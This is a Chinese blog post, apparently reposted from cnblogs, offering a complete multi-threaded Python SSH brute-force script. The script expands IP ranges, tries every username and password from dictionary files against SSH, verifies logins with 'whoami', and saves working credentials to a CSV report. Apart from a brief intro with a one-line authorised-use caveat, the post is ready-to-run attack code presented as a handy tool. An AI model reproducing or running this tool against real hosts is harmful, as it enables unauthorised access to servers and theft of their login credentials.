多线程sshd爆破程序代码

不多说了,直接上代码。代码都是很常见的写法,没有什么特别之处,权当水一篇,留作日常工作中的小工具。实测配合一份质量较好的字典,可以作为个人小工具使用(请仅在已获得授权的环境中用于弱口令自查)。

#!/usr/bin/env python
# -*- coding:utf-8 -*-

'''
SSH服务弱口令扫描脚本
'''

#引入包文件
import ipaddr
import logging
import datetime
import paramiko
import threading
from optparse import OptionParser

# Global configuration: log the bare message text at INFO level and above.
logging.basicConfig(format="%(message)s",level=logging.INFO)

# Global state shared by the functions below.
# Default dictionary file paths; change_config_files() can override them.
username_config_file = "../config/username.conf"
password_config_file = "../config/password.conf"
# Candidate usernames / passwords, filled by read_config_from_file().
username_list = []
password_list = []
# Hosts to test, filled from the command-line target options.
target_list = []
# Report rows for successful logins, appended by send_crack_packet().
result_list = []
# Set to True on the multi-threaded path; send_crack_packet() only prompts
# the user interactively while this is False.
multi_thread = False


#定义全局接口函数
def read_config_from_file():
    """Load the username and password dictionaries into the module globals.

    Reads ``username_config_file`` and ``password_config_file`` (one entry
    per line), merges the entries into ``username_list`` and
    ``password_list`` and removes duplicates.

    Only the line terminator is removed from each line, so entries that
    contain spaces are kept intact. Blank lines are skipped. Entries keep
    the order in which they first appear, so the dictionary order decides
    the order in which candidates are tried.

    Raises:
        IOError/OSError: if a dictionary file cannot be opened.
    """
    global username_list
    global password_list

    def load_entries(path, existing):
        # Start from what is already loaded so repeated calls keep merging
        # into the same lists instead of discarding earlier entries.
        merged = list(existing)
        with open(path, "r") as fr:
            for line in fr:
                entry = line.rstrip("\r\n")
                if entry:
                    merged.append(entry)
        # Order-preserving de-duplication (a plain set() would shuffle the
        # dictionary order).
        seen = set()
        unique = []
        for entry in merged:
            if entry not in seen:
                seen.add(entry)
                unique.append(entry)
        return unique

    username_list = load_entries(username_config_file, username_list)
    password_list = load_entries(password_config_file, password_list)


def change_config_files(username_file=None,password_file=None):
    """Override the dictionary file paths used by read_config_from_file().

    Args:
        username_file: new path for the username dictionary, or None to
            keep the current ``username_config_file``.
        password_file: new path for the password dictionary, or None to
            keep the current ``password_config_file``.
    """
    global username_config_file
    global password_config_file
    # Identity test: only a missing argument (None) means "leave unchanged".
    if username_file is not None:
        username_config_file = username_file
    if password_file is not None:
        password_config_file = password_file

def target_analyst(target):
    """Expand an IPv4 network string and append its addresses to target_list.

    Args:
        target: an IPv4 network in a form accepted by
            ``ipaddr.IPv4Network`` (for example ``"192.168.1.0/24"``).

    Raises:
        ValueError: propagated from ``ipaddr.IPv4Network`` when ``target``
            cannot be parsed (ipaddr's address/netmask errors are
            ValueError subclasses).
    """
    network = ipaddr.IPv4Network(target)
    hosts = [str(host) for host in network.iterhosts()]
    if not hosts:
        # iterhosts() leaves out the network and broadcast addresses, which
        # makes it yield nothing for /31 and /32. Fall back to every address
        # so a single-address CIDR such as "10.0.0.1/32" is not silently
        # dropped.
        hosts = [str(address) for address in network]
    target_list.extend(hosts)

def target_file_anylast(filename):
    """Read a target list file and return its entries.

    Args:
        filename: path of a text file holding one target per line.

    Returns:
        A list of the non-blank lines, in file order, with surrounding
        whitespace and line terminators removed.

    Raises:
        IOError/OSError: if the file cannot be opened.
    """
    file_to_target = []
    with open(filename,"r") as fr:
        for line in fr:
            each_target = line.strip()
            # Blank lines would otherwise become empty host names.
            if each_target:
                file_to_target.append(each_target)
    return file_to_target


def send_crack_packet(target,username,password,port=22,timeout=3):
    """Try one SSH password login and record it if the credentials work.

    Intended for auditing weak passwords on hosts you are authorised to
    test.

    After a successful login the function runs ``whoami`` and treats the
    attempt as a hit only when the first output line equals ``username``.
    A hit appends a CSV row to ``result_list``. In single-threaded mode
    (``multi_thread`` is False) the user is then asked whether to go on;
    any answer other than ``1`` ends the program.

    Args:
        target: host name or address to connect to.
        username: login name to try.
        password: password to try.
        port: SSH port, default 22.
        timeout: timeout in seconds passed to connect() and exec_command().

    Returns:
        True if the credentials were accepted and verified, else False.

    Raises:
        SystemExit: when the user chooses not to continue after a hit.
    """
    flag = False  # set to True only for a verified weak credential
    logging.info("[+] 爆破对象 地址%s 端口:%s 用户名:%s 口令:%s"%(str(target),str(port),str(username),str(password)))
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=target, port=port, username=username, password=password,timeout=timeout,allow_agent=False,look_for_keys = False)
        stdin, stdout, stderr = ssh.exec_command('whoami',timeout=timeout)
        output = stdout.read()
        # On Python 3 the channel returns bytes; decode before comparing.
        if not isinstance(output, str):
            output = output.decode("utf-8", "replace")
        lines = output.splitlines()
        # Compare without the trailing newline that whoami prints.
        result = lines[0].strip() if lines else ""
        if result == username:
            flag = True
            # One newline-terminated CSV row per hit.
            report_sting = "%s,%s,%s,%s,%s\n"%(str(target),"YES",str(port),str(username),str(password))
            result_list.append(report_sting)
            logging.info("[*] 爆破成功: 详细信息[地址:%s,端口:%s,用户名:%s,口令:%s]"%(str(target),str(port),str(username),str(password)))
            if multi_thread:
                # Worker threads never prompt.
                continue_flag = 1
            else:
                try:
                    try:
                        ask = raw_input  # Python 2
                    except NameError:
                        ask = input  # Python 3
                    continue_flag = int(ask("是否继续?[1]继续[2]退出"))
                except Exception:
                    # Unreadable or non-numeric answer is treated as "quit".
                    continue_flag = 2
            if continue_flag != 1:
                raise SystemExit(0)
    except Exception as ex:
        # A failed attempt (refused, timeout, bad credentials, ...) is the
        # normal case; keep going but leave a trace at debug level.
        logging.debug("[-] login attempt failed for %s: %s", str(target), ex)
    finally:
        # Always release the connection, including on SystemExit.
        ssh.close()
    return flag


def create_report(output_dir="../result", results=None):
    """Write the collected results to a timestamped CSV report.

    Args:
        output_dir: directory that receives the report; created if it does
            not exist. Defaults to ``"../result"``.
        results: iterable of CSV row strings; defaults to the module-level
            ``result_list``.

    Returns:
        The path of the report file that was written.

    Raises:
        IOError/OSError: if the directory or file cannot be created.
    """
    import os  # local import: the module header does not import os

    rows = result_list if results is None else results
    if not os.path.isdir(output_dir):
        os.makedirs(output_dir)
    time_string = str(datetime.datetime.now()).replace(" ","").replace(":","")
    report_path = os.path.join(output_dir, "%s.csv" % time_string)
    with open(report_path, "w") as fd:
        fd.write("Target-IP,WEAK,PORT,USERNAME,PASSWORD\n")
        for result_string in rows:
            # Rows carry exactly one terminator character (a space or a
            # newline); replace it so each row ends in a single newline.
            if result_string.endswith((" ", "\n")):
                result_string = result_string[:-1]
            fd.write(result_string + "\n")
    return report_path


def parameter_checker(parameter):
    """Return True when a command-line parameter carries a usable value.

    None, the empty string, a whitespace-only string and the literal
    ``"null"`` all count as "not provided". Values without a ``strip``
    method (non-strings) are compared as they are.

    Args:
        parameter: the option value to check.

    Returns:
        False if the value counts as missing, True otherwise.
    """
    if parameter is None:
        return False
    # Normalise strings so any amount of surrounding whitespace is ignored.
    value = parameter.strip() if hasattr(parameter, "strip") else parameter
    return value not in ("", "null")


def list_devide(object_list,count):
    """Split a list into at most ``count`` contiguous, balanced chunks.

    Chunk sizes differ by at most one and the larger chunks come first.
    No empty chunk is produced, so fewer than ``count`` chunks are returned
    when the list is shorter than ``count``.

    Args:
        object_list: the list to split; any non-list value yields ``[]``.
        count: desired number of chunks. Values below 1 or values that
            cannot be converted to int are treated as 1.

    Returns:
        A list of sub-lists that together contain every element of
        ``object_list`` in the original order.
    """
    if not isinstance(object_list,list):
        return []
    total = len(object_list)
    if total == 0:
        return []
    try:
        count = int(count)
    except (TypeError, ValueError):
        count = 1
    # Clamp to 1..total: guards against division by zero and against the
    # endless loop a negative step would cause.
    count = max(1, min(count, total))
    base, extra = divmod(total, count)
    return_list = []
    start = 0
    for index in range(count):
        # The first `extra` chunks take one additional element.
        end = start + base + (1 if index < extra else 0)
        return_list.append(object_list[start:end])
        start = end
    return return_list

class cracker(threading.Thread):
    """Worker thread that tests every username/password pair on its targets."""

    def __init__(self,target_list,timeout):
        """Store the targets this worker owns and the per-attempt timeout."""
        threading.Thread.__init__(self)
        self.__timeout = timeout
        self.__target_list = target_list

    def run(self):
        """Walk targets, then usernames, then passwords, one attempt each."""
        attempts = (
            (host, user, secret)
            for host in self.__target_list
            for user in username_list
            for secret in password_list
        )
        for host, user, secret in attempts:
            send_crack_packet(target=host,username=user,password=secret,timeout=self.__timeout)


if __name__ == '__main__':
    # Command-line entry point: parse options, build the target list, load
    # the dictionaries, run the scan and optionally write a report.
    parser = OptionParser()
    parser.add_option("-a","--target",dest="target",help="Target IP Addresses!")
    parser.add_option("-i","--infile",dest="infile",help="Target IP Addresses File!")
    parser.add_option("-u","--user",dest="userfile",help="Username Dictionary File!")
    parser.add_option("-p","--pswd",dest="pswdfile",help="Password Dictionary File!")
    parser.add_option("-o","--outfile",dest="outfile",help="Create A Report File! If [Yes] Create Report!")
    parser.add_option("-n","--thread",dest="threadnum",help="Count Of Thread!")
    parser.add_option("-t","--timeout",dest="timeout",help="Timeout Of Seconds!")
    (options, arges) = parser.parse_args()

    # Thread count: default 1, clamped to 1..10 so that zero or negative
    # values never reach the list splitter.
    try:
        options.threadnum = int(options.threadnum)
    except (TypeError, ValueError):
        options.threadnum = 1
    options.threadnum = max(1, min(10, options.threadnum))

    # Timeout in seconds: default 3, clamped to 1..60.
    try:
        timeout = int(options.timeout)
    except (TypeError, ValueError):
        timeout = 3
    timeout = max(1, min(60, timeout))

    if not (parameter_checker(options.target) or parameter_checker(options.infile)):
        logging.error("[-] 输入参数错误!!!")
        # Non-zero status so callers can detect the usage error.
        raise SystemExit(1)

    logging.info("[+] 目标初始化...")
    raw_targets = []
    if parameter_checker(options.infile):
        raw_targets.extend(target_file_anylast(options.infile))
    if parameter_checker(options.target):
        raw_targets.append(options.target)
    for item in raw_targets:
        item = item.strip()
        if not item:
            continue
        if "/" in item:
            # CIDR notation: expand into individual addresses.
            try:
                target_analyst(item)
            except ValueError as ex:
                logging.error("[-] invalid target network %s: %s", item, ex)
        else:
            # Everything else, including host names containing "-", is used
            # as a literal target; "a-b" ranges cannot be parsed by
            # target_analyst().
            target_list.append(item)
    logging.info("[+] 目标初始化完成!!!")

    if parameter_checker(options.userfile) or parameter_checker(options.pswdfile):
        logging.info("[+] 配置字典文件!!!")
        # Only pass on values that were really supplied so that an empty
        # option does not overwrite a default path.
        change_config_files(
            username_file=options.userfile if parameter_checker(options.userfile) else None,
            password_file=options.pswdfile if parameter_checker(options.pswdfile) else None,
        )
    read_config_from_file()

    logging.info("[+] 开始扫描")
    if options.threadnum == 1:
        # Single-threaded scan.
        for target in target_list:
            for username in username_list:
                for password in password_list:
                    send_crack_packet(target=target,username=username,password=password,timeout=timeout)
    else:
        # Multi-threaded scan: one worker per slice of the target list.
        multi_thread = True
        thread_list = [
            cracker(thread_target, timeout)
            for thread_target in list_devide(target_list, options.threadnum)
        ]
        for thread in thread_list:
            thread.start()
        for thread in thread_list:
            thread.join()

    # The help text advertises "Yes", so compare case-insensitively.
    if parameter_checker(options.outfile) and options.outfile.strip().lower() == "yes":
        logging.info("[+] 生成报告中...")
        create_report()
        logging.info("[+] 报告已生成!!!")
    logging.info("[+] 扫描完成")

原文地址:https://www.cnblogs.com/mutudou/p/13602216.html